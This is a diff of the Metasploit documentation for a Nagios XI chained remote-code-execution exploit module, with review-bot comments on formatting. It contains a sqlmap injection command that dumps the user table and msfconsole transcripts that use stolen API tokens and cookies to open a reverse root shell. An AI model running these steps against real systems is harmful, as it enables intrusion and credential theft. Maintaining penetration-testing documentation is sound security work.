diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md index 94d89df99b..e243236cd1 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md @@ -30,15 +30,15 @@ anyway. ## Options - **USERID** + **USER_ID** - If you wish to exploit a particular UserID, that can be specified here. Default is 1, which is most likely the admin account. + If you wish to exploit a particular ```USER_ID```, that can be specified here. Default is 1, which is most likely the admin account. - **APITOKEN** + **API_TOKEN** The SQLi included only works for MySQL, which should work in most cases. However, if you experience a different backend, you can enumerate the user - table via sqlmap: ```sqlmap -u "http:///nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```. - Then you can set the UserID and APITOKEN to skip those phases and move on to exploitation. Default is empty. See example below for more usage. + table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```. + Then you can set the ```USER_ID``` and ```API_TOKEN``` to skip those phases and move on to exploitation. Default is empty. See example below for more usage. ## Usage 
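Review bot: in the Options hunk, the option names are wrapped in inline triple backticks (three backticks around `USER_ID` and `API_TOKEN`); use single backticks for inline code, since triple backticks are the fence marker and render inconsistently inline. The same applies to the sqlmap command, which is long enough to deserve its own fenced block rather than living inside a sentence. The rewording "If you wish to exploit a particular `USER_ID`" also reads oddly, because it is the user that is targeted, not the option; suggest "If you wish to target a particular user ID, set `USER_ID`". The `http://[ip]/` placeholder in the sqlmap URL is the right fix; the previous `http:///` was missing the host.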
@@ -95,15 +95,15 @@ msf exploit(nagios_xi_chained_rce) > show options Module options (exploit/linux/http/nagios_xi_chained_rce): - Name Current Setting Required Description - ---- --------------- -------- ----------- - APITOKEN no If an API Token was already stolen, skip the sqli - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOST 192.168.2.218 yes The target address - RPORT 80 yes The target port - SSL false no Negotiate SSL/TLS for outgoing connections - USERID 1 yes User ID in the database to target - VHOST no HTTP server virtual host + Name Current Setting Required Description + ---- --------------- -------- ----------- + API_TOKEN no If an API token was already stolen, skip the SQLi + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOST 192.168.2.218 yes The target address + RPORT 80 yes The target port + SSL false no Negotiate SSL/TLS for outgoing connections + USER_ID 1 yes User ID in the database to target + VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_bash): 
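Review bot: the updated `show options` table only matches real output if the Ruby module itself registers the options as `USER_ID` and `API_TOKEN` with the descriptions shown here ("If an API token was already stolen, skip the SQLi", "User ID in the database to target"); this diff touches only the documentation file, so confirm the module's `register_options` was renamed in the same change, otherwise the documented output drifts from what a user sees. A short note in the Options section that msfconsole option names are case-insensitive (so `set userid 2` still works) would explain why older transcripts differ from the canonical upper-case form used here.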
@@ -146,22 +146,22 @@ Table: xi_users | 2 | admin2 | admin2@admin2.com | 1 | admin2 | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g | +---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+ -...sip... +...snip... ``` #### Re-target -Now, we can set the UserID and APIToken (backend_ticket) +Now, we can set the ```USER_ID``` and ```API_TOKEN``` (backend_ticket) -```msf exploit(nagios_xi_chained_rce) > set userid 2 -userid => 2 -msf exploit(nagios_xi_chained_rce) > set apitoken 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g -apitoken => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g +``` +msf exploit(nagios_xi_chained_rce) > set USER_ID 2 +USER_ID => 2 +msf exploit(nagios_xi_chained_rce) > set API_TOKEN 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g +API_TOKEN => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g msf exploit(nagios_xi_chained_rce) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Nagios XI version: 5.2.7 [*] Getting admin cookie -[+] 2-tGRcLXmX-e1b4545976adf651e80a15c92200624d [+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6; [+] CSRF token: c53d1f591264a3ea771639a7782627f8 [*] Getting monitored host 
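Review bot: dropping the `[+] 2-tGRcLXmX-e1b4545976adf651e80a15c92200624d` line from the Re-target transcript changes the documented output; if the module still prints that intermediate value the example should keep it, since the transcript is meant to be pasted output, and if the module no longer prints it that is worth a sentence in the commit message. The `...snip...` typo fix and moving `msf exploit(nagios_xi_chained_rce) > set USER_ID 2` onto its own line after the opening fence are correct, since the old form put the first command on the fence line and broke rendering. The "Now, we can set the `USER_ID` and `API_TOKEN` (backend_ticket)" line has the same inline-triple-backtick style issue as the Options section, and the parenthetical is terse; suggest "the `API_TOKEN` is the `backend_ticket` column from the `xi_users` dump above".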
@@ -185,32 +185,3 @@ QajRDDToeigHGMFdUbaClxkLfJbxqBKv whoami root ``` - -#### No APIToken -Or if the backend is MySQL but we want to target a different user, we can simply just set the userid with no APIToken. - -``` -msf exploit(nagios_xi_chained_rce) > set apitoken '' -apitoken => -msf exploit(nagios_xi_chained_rce) > exploit - -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Nagios XI version: 5.2.7 -[*] Getting API token -[+] API token: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g -[*] Getting admin cookie -[+] 2-zIajIKUA-e1b4545976adf651e80a15c92200624d -[+] Admin cookie: nagiosxi=kjeqq7f074pgn61q8l27togtr3; -[+] CSRF token: 05ab9c5c27d99e7c13821a3b43d0f5a6 -[*] Getting monitored host -[+] Monitored host: localhost -[*] Downloading component -[*] Uploading root shell -[*] Popping shell! -[*] Command shell session 3 opened (192.168.2.117:4444 -> 192.168.2.218:51054) at 2016-10-10 10:17:12 -0400 -[*] Cleaning up... -[*] rm -rf ../profile -[*] unzip -qd .. ../../../../tmp/component-profile.zip -[*] chown -R nagios:nagios ../profile -[*] rm -f ../../../../tmp/component-xrnIbKdJ.zip -```
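Review bot: removing the whole "No APIToken" section leaves the Options text ("set the `USER_ID` and `API_TOKEN` to skip those phases ... See example below for more usage") with no example of the case it describes, namely re-targeting a different `USER_ID` with `API_TOKEN` left empty so the module recovers the token itself. Rather than deleting it, update the section to the new option names (heading `#### No API_TOKEN`, `set API_TOKEN ''`) so both documented workflows survive; if it was cut because the transcript was stale, say so in the commit message. The deleted transcript also carried the module's cleanup commands (`rm -rf ../profile`, `unzip -qd .. ../../../../tmp/component-profile.zip`, `chown -R nagios:nagios ../profile`), which are useful to anyone verifying after a test that the uploaded component was actually removed from the host; keep them somewhere in the doc.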